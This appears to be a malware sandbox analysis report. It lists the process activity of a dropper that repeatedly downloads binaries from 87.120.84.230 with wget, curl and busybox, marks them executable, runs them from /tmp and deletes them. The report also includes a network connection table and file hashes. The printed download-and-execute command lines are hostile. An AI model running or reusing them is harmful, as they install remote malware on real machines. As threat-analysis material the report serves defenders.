[/bin/busybox wget http://87.120.84.230/bins/xKuu4u7HcsskZEVp2tRyGDPs6APgWNz4RJ]

/bin/chmod

[chmod 777 xKuu4u7HcsskZEVp2tRyGDPs6APgWNz4RJ]

/tmp/xKuu4u7HcsskZEVp2tRyGDPs6APgWNz4RJ

[./xKuu4u7HcsskZEVp2tRyGDPs6APgWNz4RJ]

/bin/rm

[rm xKuu4u7HcsskZEVp2tRyGDPs6APgWNz4RJ]

/usr/bin/wget

[wget http://87.120.84.230/bins/MXwNqP9JQwDdVr4rvrMXgakYfN2hmuvv75]

/usr/bin/curl

[curl -O http://87.120.84.230/bins/MXwNqP9JQwDdVr4rvrMXgakYfN2hmuvv75]

/bin/busybox

[/bin/busybox wget http://87.120.84.230/bins/MXwNqP9JQwDdVr4rvrMXgakYfN2hmuvv75]

/bin/chmod

[chmod 777 MXwNqP9JQwDdVr4rvrMXgakYfN2hmuvv75]

/tmp/MXwNqP9JQwDdVr4rvrMXgakYfN2hmuvv75

[./MXwNqP9JQwDdVr4rvrMXgakYfN2hmuvv75]

/bin/rm

[rm MXwNqP9JQwDdVr4rvrMXgakYfN2hmuvv75]

/usr/bin/wget

[wget http://87.120.84.230/bins/PlQKoW0kJhdQZbt11mGFzaMlQxeenteUly]

/usr/bin/curl

[curl -O http://87.120.84.230/bins/PlQKoW0kJhdQZbt11mGFzaMlQxeenteUly]

/bin/busybox

[/bin/busybox wget http://87.120.84.230/bins/PlQKoW0kJhdQZbt11mGFzaMlQxeenteUly]

/bin/chmod

[chmod 777 PlQKoW0kJhdQZbt11mGFzaMlQxeenteUly]

/tmp/PlQKoW0kJhdQZbt11mGFzaMlQxeenteUly

[./PlQKoW0kJhdQZbt11mGFzaMlQxeenteUly]

/bin/rm

[rm PlQKoW0kJhdQZbt11mGFzaMlQxeenteUly]

/usr/bin/wget

[wget http://87.120.84.230/bins/tU5e3Mv37VUeG95FvGDrBgsbQUnkV9Sm98]

/usr/bin/curl

[curl -O http://87.120.84.230/bins/tU5e3Mv37VUeG95FvGDrBgsbQUnkV9Sm98]

/bin/busybox

[/bin/busybox wget http://87.120.84.230/bins/tU5e3Mv37VUeG95FvGDrBgsbQUnkV9Sm98]

/bin/chmod

[chmod 777 tU5e3Mv37VUeG95FvGDrBgsbQUnkV9Sm98]

/tmp/tU5e3Mv37VUeG95FvGDrBgsbQUnkV9Sm98

[./tU5e3Mv37VUeG95FvGDrBgsbQUnkV9Sm98]

/bin/rm

[rm tU5e3Mv37VUeG95FvGDrBgsbQUnkV9Sm98]

/usr/bin/wget

[wget http://87.120.84.230/bins/51dXcnvJHWjaUe2kuPjUkfCauRrbMjuAW5]

/usr/bin/curl

[curl -O http://87.120.84.230/bins/51dXcnvJHWjaUe2kuPjUkfCauRrbMjuAW5]

/bin/busybox

[/bin/busybox wget http://87.120.84.230/bins/51dXcnvJHWjaUe2kuPjUkfCauRrbMjuAW5]

/bin/chmod

[chmod 777 51dXcnvJHWjaUe2kuPjUkfCauRrbMjuAW5]

/tmp/51dXcnvJHWjaUe2kuPjUkfCauRrbMjuAW5

[./51dXcnvJHWjaUe2kuPjUkfCauRrbMjuAW5]

/bin/rm

[rm 51dXcnvJHWjaUe2kuPjUkfCauRrbMjuAW5]

/usr/bin/wget

[wget http://87.120.84.230/bins/qCXc0xGeyWJSKbsx2jYBPhMBInhHtGjpQ9]

/usr/bin/curl

[curl -O http://87.120.84.230/bins/qCXc0xGeyWJSKbsx2jYBPhMBInhHtGjpQ9]

/bin/busybox

[/bin/busybox wget http://87.120.84.230/bins/qCXc0xGeyWJSKbsx2jYBPhMBInhHtGjpQ9]

/bin/chmod

[chmod 777 qCXc0xGeyWJSKbsx2jYBPhMBInhHtGjpQ9]

/tmp/qCXc0xGeyWJSKbsx2jYBPhMBInhHtGjpQ9

[./qCXc0xGeyWJSKbsx2jYBPhMBInhHtGjpQ9]

/bin/rm

[rm qCXc0xGeyWJSKbsx2jYBPhMBInhHtGjpQ9]

/usr/bin/wget

[wget http://87.120.84.230/bins/7QPUIgJ5ltsVoojrpK34GdrD0dsgtmAvkd]

/usr/bin/curl

[curl -O http://87.120.84.230/bins/7QPUIgJ5ltsVoojrpK34GdrD0dsgtmAvkd]

/bin/busybox

[/bin/busybox wget http://87.120.84.230/bins/7QPUIgJ5ltsVoojrpK34GdrD0dsgtmAvkd]

/bin/chmod

[chmod 777 7QPUIgJ5ltsVoojrpK34GdrD0dsgtmAvkd]

/tmp/7QPUIgJ5ltsVoojrpK34GdrD0dsgtmAvkd

[./7QPUIgJ5ltsVoojrpK34GdrD0dsgtmAvkd]

/bin/rm

[rm 7QPUIgJ5ltsVoojrpK34GdrD0dsgtmAvkd]

/usr/bin/wget

[wget http://87.120.84.230/bins/133lcy7pgamNJ6wgAd9Z0NryEjUMcKTKqX]

/usr/bin/curl

[curl -O http://87.120.84.230/bins/133lcy7pgamNJ6wgAd9Z0NryEjUMcKTKqX]

/bin/busybox

[/bin/busybox wget http://87.120.84.230/bins/133lcy7pgamNJ6wgAd9Z0NryEjUMcKTKqX]

/bin/chmod

[chmod 777 133lcy7pgamNJ6wgAd9Z0NryEjUMcKTKqX]

/tmp/133lcy7pgamNJ6wgAd9Z0NryEjUMcKTKqX

[./133lcy7pgamNJ6wgAd9Z0NryEjUMcKTKqX]

/bin/rm

[rm 133lcy7pgamNJ6wgAd9Z0NryEjUMcKTKqX]

/usr/bin/wget

[wget http://87.120.84.230/bins/Zl0SaFKIfoluyEvIdLmSRKIXc2UJG2ePme]

/usr/bin/curl

[curl -O http://87.120.84.230/bins/Zl0SaFKIfoluyEvIdLmSRKIXc2UJG2ePme]

/bin/busybox

[/bin/busybox wget http://87.120.84.230/bins/Zl0SaFKIfoluyEvIdLmSRKIXc2UJG2ePme]

/bin/chmod

[chmod 777 Zl0SaFKIfoluyEvIdLmSRKIXc2UJG2ePme]

/tmp/Zl0SaFKIfoluyEvIdLmSRKIXc2UJG2ePme

[./Zl0SaFKIfoluyEvIdLmSRKIXc2UJG2ePme]

/bin/rm

[rm Zl0SaFKIfoluyEvIdLmSRKIXc2UJG2ePme]

/usr/bin/wget

[wget http://87.120.84.230/bins/05wZaxcTa605jhQnQNan9ekTwiVCkYY7pS]

/usr/bin/curl

[curl -O http://87.120.84.230/bins/05wZaxcTa605jhQnQNan9ekTwiVCkYY7pS]

/bin/busybox

[/bin/busybox wget http://87.120.84.230/bins/05wZaxcTa605jhQnQNan9ekTwiVCkYY7pS]

/bin/chmod

[chmod 777 05wZaxcTa605jhQnQNan9ekTwiVCkYY7pS]

/tmp/05wZaxcTa605jhQnQNan9ekTwiVCkYY7pS

[./05wZaxcTa605jhQnQNan9ekTwiVCkYY7pS]

/bin/rm

[rm 05wZaxcTa605jhQnQNan9ekTwiVCkYY7pS]

/usr/bin/wget

[wget http://87.120.84.230/bins/y1efnhqJfPBB9JFqlcbE4RTK4HvogBTJ7G]

/usr/bin/curl

[curl -O http://87.120.84.230/bins/y1efnhqJfPBB9JFqlcbE4RTK4HvogBTJ7G]

/bin/busybox

[/bin/busybox wget http://87.120.84.230/bins/y1efnhqJfPBB9JFqlcbE4RTK4HvogBTJ7G]

/bin/chmod

[chmod 777 y1efnhqJfPBB9JFqlcbE4RTK4HvogBTJ7G]

/tmp/y1efnhqJfPBB9JFqlcbE4RTK4HvogBTJ7G

[./y1efnhqJfPBB9JFqlcbE4RTK4HvogBTJ7G]

/bin/rm

[rm y1efnhqJfPBB9JFqlcbE4RTK4HvogBTJ7G]

/usr/bin/wget

[wget http://87.120.84.230/bins/gRXScggvICs157KIrJp9HsjjV4vEZKOAKc]

/usr/bin/curl

[curl -O http://87.120.84.230/bins/gRXScggvICs157KIrJp9HsjjV4vEZKOAKc]

/bin/busybox

[/bin/busybox wget http://87.120.84.230/bins/gRXScggvICs157KIrJp9HsjjV4vEZKOAKc]

/bin/chmod

[chmod 777 gRXScggvICs157KIrJp9HsjjV4vEZKOAKc]

/tmp/gRXScggvICs157KIrJp9HsjjV4vEZKOAKc

[./gRXScggvICs157KIrJp9HsjjV4vEZKOAKc]

/bin/rm

[rm gRXScggvICs157KIrJp9HsjjV4vEZKOAKc]

/usr/bin/wget

[wget http://87.120.84.230/bins/rJUunYHQQh3veQstczQ4iBZ3NnKmlMikoB]

/usr/bin/curl

[curl -O http://87.120.84.230/bins/rJUunYHQQh3veQstczQ4iBZ3NnKmlMikoB]

/bin/busybox

[/bin/busybox wget http://87.120.84.230/bins/rJUunYHQQh3veQstczQ4iBZ3NnKmlMikoB]

/bin/chmod

[chmod 777 rJUunYHQQh3veQstczQ4iBZ3NnKmlMikoB]

/tmp/rJUunYHQQh3veQstczQ4iBZ3NnKmlMikoB

[./rJUunYHQQh3veQstczQ4iBZ3NnKmlMikoB]

/bin/rm

[rm rJUunYHQQh3veQstczQ4iBZ3NnKmlMikoB]

/usr/bin/wget

[wget http://87.120.84.230/bins/hJQqqM876sLvlWjDRPK2XPYJg1jx4MnQ0N]

/usr/bin/curl

[curl -O http://87.120.84.230/bins/hJQqqM876sLvlWjDRPK2XPYJg1jx4MnQ0N]

/bin/busybox

[/bin/busybox wget http://87.120.84.230/bins/hJQqqM876sLvlWjDRPK2XPYJg1jx4MnQ0N]

/bin/chmod

[chmod 777 hJQqqM876sLvlWjDRPK2XPYJg1jx4MnQ0N]

/tmp/hJQqqM876sLvlWjDRPK2XPYJg1jx4MnQ0N

[./hJQqqM876sLvlWjDRPK2XPYJg1jx4MnQ0N]

/bin/rm

[rm hJQqqM876sLvlWjDRPK2XPYJg1jx4MnQ0N]

/usr/bin/wget

[wget http://87.120.84.230/bins/tU5e3Mv37VUeG95FvGDrBgsbQUnkV9Sm98]

/usr/bin/curl

[curl -O http://87.120.84.230/bins/tU5e3Mv37VUeG95FvGDrBgsbQUnkV9Sm98]

/bin/busybox

[/bin/busybox wget http://87.120.84.230/bins/tU5e3Mv37VUeG95FvGDrBgsbQUnkV9Sm98]

/bin/chmod

[chmod 777 tU5e3Mv37VUeG95FvGDrBgsbQUnkV9Sm98]

/tmp/tU5e3Mv37VUeG95FvGDrBgsbQUnkV9Sm98

[./tU5e3Mv37VUeG95FvGDrBgsbQUnkV9Sm98]

/bin/rm

[rm tU5e3Mv37VUeG95FvGDrBgsbQUnkV9Sm98]

/usr/bin/wget

[wget http://87.120.84.230/bins/xKuu4u7HcsskZEVp2tRyGDPs6APgWNz4RJ]

/usr/bin/curl

[curl -O http://87.120.84.230/bins/xKuu4u7HcsskZEVp2tRyGDPs6APgWNz4RJ]

/bin/busybox

[/bin/busybox wget http://87.120.84.230/bins/xKuu4u7HcsskZEVp2tRyGDPs6APgWNz4RJ]

/bin/chmod

[chmod 777 xKuu4u7HcsskZEVp2tRyGDPs6APgWNz4RJ]

/tmp/xKuu4u7HcsskZEVp2tRyGDPs6APgWNz4RJ

[./xKuu4u7HcsskZEVp2tRyGDPs6APgWNz4RJ]

/bin/rm

[rm xKuu4u7HcsskZEVp2tRyGDPs6APgWNz4RJ]

/usr/bin/wget

[wget http://87.120.84.230/bins/MXwNqP9JQwDdVr4rvrMXgakYfN2hmuvv75]

/usr/bin/curl

[curl -O http://87.120.84.230/bins/MXwNqP9JQwDdVr4rvrMXgakYfN2hmuvv75]

/bin/busybox

[/bin/busybox wget http://87.120.84.230/bins/MXwNqP9JQwDdVr4rvrMXgakYfN2hmuvv75]

/bin/chmod

[chmod 777 MXwNqP9JQwDdVr4rvrMXgakYfN2hmuvv75]

/tmp/MXwNqP9JQwDdVr4rvrMXgakYfN2hmuvv75

[./MXwNqP9JQwDdVr4rvrMXgakYfN2hmuvv75]

/bin/rm

[rm MXwNqP9JQwDdVr4rvrMXgakYfN2hmuvv75]

/usr/bin/wget

[wget http://87.120.84.230/bins/PlQKoW0kJhdQZbt11mGFzaMlQxeenteUly]

/usr/bin/curl

[curl -O http://87.120.84.230/bins/PlQKoW0kJhdQZbt11mGFzaMlQxeenteUly]

/bin/busybox

[/bin/busybox wget http://87.120.84.230/bins/PlQKoW0kJhdQZbt11mGFzaMlQxeenteUly]

/bin/chmod

[chmod 777 PlQKoW0kJhdQZbt11mGFzaMlQxeenteUly]

/tmp/PlQKoW0kJhdQZbt11mGFzaMlQxeenteUly

[./PlQKoW0kJhdQZbt11mGFzaMlQxeenteUly]

/bin/rm

[rm PlQKoW0kJhdQZbt11mGFzaMlQxeenteUly]

Network

Country Destination Domain Proto
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp

Files

/tmp/qCXc0xGeyWJSKbsx2jYBPhMBInhHtGjpQ9

MD5 998368d7c95ea4293237f2320546e440
SHA1 30dfd2d3bb8a7e3241bd7792e90a98ebb70be3a4
SHA256 533a1ca5d6595793725bca7641d9461a0f00dd1732dded3e4281196f5dd21736
SHA512 648c4720a85dbf834be1ba00f0e1b4167cc670fe15896efb00a77fb6e0c225a13aae3da10d85fa6e7f726420d9bb3c20c43466e02296d44153c127b7160e0b97